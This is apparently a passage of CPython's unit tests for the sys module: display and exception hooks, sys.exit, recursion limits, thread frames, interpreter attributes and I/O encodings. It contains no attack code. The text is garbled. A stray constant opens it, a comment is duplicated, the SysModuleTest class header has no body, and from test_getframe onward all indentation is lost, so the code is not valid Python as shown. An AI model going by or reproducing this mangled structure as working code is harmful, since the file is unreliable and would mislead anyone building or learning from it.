DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
    """Tests for sys.displayhook / sys.__displayhook__ behaviour."""

    def test_original_displayhook(self):
        dh = sys.__displayhook__

        with support.captured_stdout() as out:
            dh(42)

        self.assertEqual(out.getvalue(), "42\n")
        self.assertEqual(builtins._, 42)

        del builtins._

        with support.captured_stdout() as out:
            dh(None)

        self.assertEqual(out.getvalue(), "")
        self.assertTrue(not hasattr(builtins, "_"))

        # sys.displayhook() requires arguments
        self.assertRaises(TypeError, dh)

        stdout = sys.stdout
        try:
            # The hook must raise RuntimeError when sys.stdout is missing.
            del sys.stdout
            self.assertRaises(RuntimeError, dh, 42)
        finally:
            sys.stdout = stdout

    def test_lost_displayhook(self):
        displayhook = sys.displayhook
        try:
            del sys.displayhook
            code = compile("42", "<string>", "single")
            self.assertRaises(RuntimeError, eval, code)
        finally:
            sys.displayhook = displayhook

    def test_custom_displayhook(self):
        def baddisplayhook(obj):
            raise ValueError

        with support.swap_attr(sys, 'displayhook', baddisplayhook):
            code = compile("42", "<string>", "single")
            self.assertRaises(ValueError, eval, code)
class ActiveExceptionTests(unittest.TestCase):
    """Tests for sys.exc_info() and sys.exception() inside and outside an
    active exception handler."""

    def test_exc_info_no_exception(self):
        self.assertEqual(sys.exc_info(), (None, None, None))

    def test_sys_exception_no_exception(self):
        self.assertEqual(sys.exception(), None)

    def test_exc_info_with_exception_instance(self):
        def f():
            raise ValueError(42)

        try:
            f()
        except Exception as e_:
            e = e_
            exc_info = sys.exc_info()

        self.assertIsInstance(e, ValueError)
        self.assertIs(exc_info[0], ValueError)
        self.assertIs(exc_info[1], e)
        self.assertIs(exc_info[2], e.__traceback__)

    def test_exc_info_with_exception_type(self):
        def f():
            raise ValueError

        try:
            f()
        except Exception as e_:
            e = e_
            exc_info = sys.exc_info()

        self.assertIsInstance(e, ValueError)
        self.assertIs(exc_info[0], ValueError)
        self.assertIs(exc_info[1], e)
        self.assertIs(exc_info[2], e.__traceback__)

    def test_sys_exception_with_exception_instance(self):
        def f():
            raise ValueError(42)

        try:
            f()
        except Exception as e_:
            e = e_
            exc = sys.exception()

        self.assertIsInstance(e, ValueError)
        self.assertIs(exc, e)

    def test_sys_exception_with_exception_type(self):
        def f():
            raise ValueError

        try:
            f()
        except Exception as e_:
            e = e_
            exc = sys.exception()

        self.assertIsInstance(e, ValueError)
        self.assertIs(exc, e)
class ExceptHookTest(unittest.TestCase):
    """Tests for sys.excepthook / sys.__excepthook__."""

    def test_original_excepthook(self):
        try:
            raise ValueError(42)
        except ValueError as exc:
            with support.captured_stderr() as err:
                sys.__excepthook__(*sys.exc_info())

        self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))

        self.assertRaises(TypeError, sys.__excepthook__)

    def test_excepthook_bytes_filename(self):
        # bpo-37467: sys.excepthook() must not crash if a filename
        # is a bytes string
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', BytesWarning)

            try:
                raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
            except SyntaxError as exc:
                with support.captured_stderr() as err:
                    sys.__excepthook__(*sys.exc_info())

        err = err.getvalue()
        self.assertIn("""  File "b'bytes_filename'", line 123\n""", err)
        self.assertIn("""    text\n""", err)
        self.assertTrue(err.endswith("SyntaxError: msg\n"))

    def test_excepthook(self):
        with test.support.captured_output("stderr") as stderr:
            sys.excepthook(1, '1', 1)
        self.assertTrue("TypeError: print_exception(): Exception expected for " \
                         "value, str found" in stderr.getvalue())

    # FIXME: testing the code for a lost or replaced excepthook in
    # Python/pythonrun.c::PyErr_PrintEx() is tricky.
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
    # Ensure no child process from subprocess-based tests outlives a test.
    test.support.reap_children()
def test_exit(self):
    """Exercise sys.exit() with various argument types, plus the
    interpreter's exit-message machinery in subprocesses."""
    # call with two arguments
    self.assertRaises(TypeError, sys.exit, 42, 42)

    # call without argument
    with self.assertRaises(SystemExit) as cm:
        sys.exit()
    self.assertIsNone(cm.exception.code)

    rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
    self.assertEqual(rc, 0)
    self.assertEqual(out, b'')
    self.assertEqual(err, b'')

    # call with integer argument
    with self.assertRaises(SystemExit) as cm:
        sys.exit(42)
    self.assertEqual(cm.exception.code, 42)

    # call with tuple argument with one entry
    # entry will be unpacked
    with self.assertRaises(SystemExit) as cm:
        sys.exit((42,))
    self.assertEqual(cm.exception.code, 42)

    # call with string argument
    with self.assertRaises(SystemExit) as cm:
        sys.exit("exit")
    self.assertEqual(cm.exception.code, "exit")

    # call with tuple argument with two entries
    with self.assertRaises(SystemExit) as cm:
        sys.exit((17, 23))
    self.assertEqual(cm.exception.code, (17, 23))

    # test that the exit machinery handles SystemExits properly
    rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
    self.assertEqual(rc, 47)
    self.assertEqual(out, b'')
    self.assertEqual(err, b'')

    def check_exit_message(code, expected, **env_vars):
        # Helper: run *code* in a subprocess and check stderr's prefix.
        rc, out, err = assert_python_failure('-c', code, **env_vars)
        self.assertEqual(rc, 1)
        self.assertEqual(out, b'')
        self.assertTrue(err.startswith(expected),
            "%s doesn't start with %s" % (ascii(err), ascii(expected)))

    # test that stderr buffer is flushed before the exit message is written
    # into stderr
    check_exit_message(
        r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
        b"unflushed,message")

    # test that the exit message is written with backslashreplace error
    # handler to stderr
    check_exit_message(
        r'import sys; sys.exit("surrogates:\uDCFF")',
        b"surrogates:\\udcff")

    # test that the unicode message is encoded to the stderr encoding
    # instead of the default encoding (utf8)
    check_exit_message(
        r'import sys; sys.exit("h\xe9")',
        b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
    """sys.getdefaultencoding() takes no arguments and returns a str."""
    self.assertRaises(TypeError, sys.getdefaultencoding, 42)
    # can't check more than the type, as the user might have changed it
    self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
    """sys.setswitchinterval rejects bad values and round-trips good ones."""
    self.assertRaises(TypeError, sys.setswitchinterval)
    self.assertRaises(TypeError, sys.setswitchinterval, "a")
    self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
    self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
    orig = sys.getswitchinterval()
    # sanity check
    self.assertTrue(orig < 0.5, orig)
    try:
        for n in 0.00001, 0.05, 3.0, orig:
            sys.setswitchinterval(n)
            self.assertAlmostEqual(sys.getswitchinterval(), n)
    finally:
        # Restore the interpreter-wide setting whatever happened above.
        sys.setswitchinterval(orig)
def test_recursionlimit(self):
    """Basic get/set round-trip for the recursion limit."""
    self.assertRaises(TypeError, sys.getrecursionlimit, 42)
    oldlimit = sys.getrecursionlimit()
    self.assertRaises(TypeError, sys.setrecursionlimit)
    self.assertRaises(ValueError, sys.setrecursionlimit, -42)
    sys.setrecursionlimit(10000)
    self.assertEqual(sys.getrecursionlimit(), 10000)
    sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
    """Hitting the recursion limit twice in a row must raise cleanly both
    times (issue #5392)."""
    if hasattr(sys, 'gettrace') and sys.gettrace():
        self.skipTest('fatal error if run with a trace function')

    oldlimit = sys.getrecursionlimit()
    def f():
        f()
    try:
        for depth in (50, 75, 100, 250, 1000):
            try:
                sys.setrecursionlimit(depth)
            except RecursionError:
                # Issue #25274: The recursion limit is too low at the
                # current recursion depth
                continue

            # Issue #5392: test stack overflow after hitting recursion
            # limit twice
            with self.assertRaises(RecursionError):
                f()
            with self.assertRaises(RecursionError):
                f()
    finally:
        sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
    # Issue #25274: Setting a low recursion limit must be blocked if the
    # current recursion depth is already higher than limit.

    from _testinternalcapi import get_recursion_depth

    def set_recursion_limit_at_depth(depth, limit):
        # Recurse until we are *at* the requested depth, then try to set
        # a limit below it and expect a RecursionError.
        recursion_depth = get_recursion_depth()
        if recursion_depth >= depth:
            with self.assertRaises(RecursionError) as cm:
                sys.setrecursionlimit(limit)
            self.assertRegex(str(cm.exception),
                "cannot set the recursion limit to [0-9]+ "
                "at the recursion depth [0-9]+: "
                "the limit is too low")
        else:
            set_recursion_limit_at_depth(depth, limit)

    oldlimit = sys.getrecursionlimit()
    try:
        sys.setrecursionlimit(1000)

        for limit in (10, 25, 50, 75, 100, 150, 200):
            set_recursion_limit_at_depth(limit, limit)
    finally:
        sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
    """sys.getwindowsversion() returns a 5-tuple with named attributes
    (Windows only; skipped elsewhere)."""
    # Raise SkipTest if sys doesn't have getwindowsversion attribute
    test.support.get_attribute(sys, "getwindowsversion")
    v = sys.getwindowsversion()
    self.assertEqual(len(v), 5)
    self.assertIsInstance(v[0], int)
    self.assertIsInstance(v[1], int)
    self.assertIsInstance(v[2], int)
    self.assertIsInstance(v[3], int)
    self.assertIsInstance(v[4], str)
    self.assertRaises(IndexError, operator.getitem, v, 5)
    self.assertIsInstance(v.major, int)
    self.assertIsInstance(v.minor, int)
    self.assertIsInstance(v.build, int)
    self.assertIsInstance(v.platform, int)
    self.assertIsInstance(v.service_pack, str)
    self.assertIsInstance(v.service_pack_minor, int)
    self.assertIsInstance(v.service_pack_major, int)
    self.assertIsInstance(v.suite_mask, int)
    self.assertIsInstance(v.product_type, int)
    self.assertEqual(v[0], v.major)
    self.assertEqual(v[1], v.minor)
    self.assertEqual(v[2], v.build)
    self.assertEqual(v[3], v.platform)
    self.assertEqual(v[4], v.service_pack)

    # This is how platform.py calls it. Make sure tuple
    # still has 5 elements
    maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
    # sys.call_tracing requires its second argument to be a tuple.
    self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
                     'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
    """get/set round-trip for the dlopen() flags used when loading
    extension modules."""
    self.assertTrue(hasattr(sys, "getdlopenflags"))
    self.assertRaises(TypeError, sys.getdlopenflags, 42)
    oldflags = sys.getdlopenflags()
    self.assertRaises(TypeError, sys.setdlopenflags)
    sys.setdlopenflags(oldflags+1)
    self.assertEqual(sys.getdlopenflags(), oldflags+1)
    sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
    # n here must be a global in order for this test to pass while
    # tracing with a python function. Tracing calls PyFrame_FastToLocals
    # which will add a copy of any locals to the frame object, causing
    # the reference count to increase by 2 instead of 1.
    global n
    self.assertRaises(TypeError, sys.getrefcount)
    c = sys.getrefcount(None)
    n = None
    self.assertEqual(sys.getrefcount(None), c+1)
    del n
    self.assertEqual(sys.getrefcount(None), c)
    if hasattr(sys, "gettotalrefcount"):
        self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
@threading_helper.requires_working_threading()
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
@threading_helper.requires_working_threading()
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash13", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
elif algo == 3:
self.assertEqual(sys.hash_info.algorithm, "siphash13")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash13", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
@unittest.skipUnless(support.is_emscripten, "only available on Emscripten")
def test_emscripten_info(self):
self.assertEqual(len(sys._emscripten_info), 4)
self.assertIsInstance(sys._emscripten_info.emscripten_version, tuple)
self.assertIsInstance(sys._emscripten_info.runtime, (str, type(None)))
self.assertIsInstance(sys._emscripten_info.pthreads, bool)
self.assertIsInstance(sys._emscripten_info.shared_memory, bool)
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding", "safe_path")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr in ("dev_mode", "safe_path") else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
@support.requires_subprocess()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
@support.requires_subprocess()
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@support.requires_subprocess()
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
@support.requires_subprocess()
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
@support.requires_subprocess()
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
# Output of sys._debugmallocstats() depends on configure flags.
# The sysconfig vars are not available on Windows.
if sys.platform != "win32":
with_freelists = sysconfig.get_config_var("WITH_FREELISTS")
with_pymalloc = sysconfig.get_config_var("WITH_PYMALLOC")
if with_freelists:
self.assertIn(b"free PyDictObjects", err)
if with_pymalloc:
self.assertIn(b'Small block threshold', err)
if not with_freelists and not with_pymalloc:
self.assertFalse(err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
@support.requires_subprocess()
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
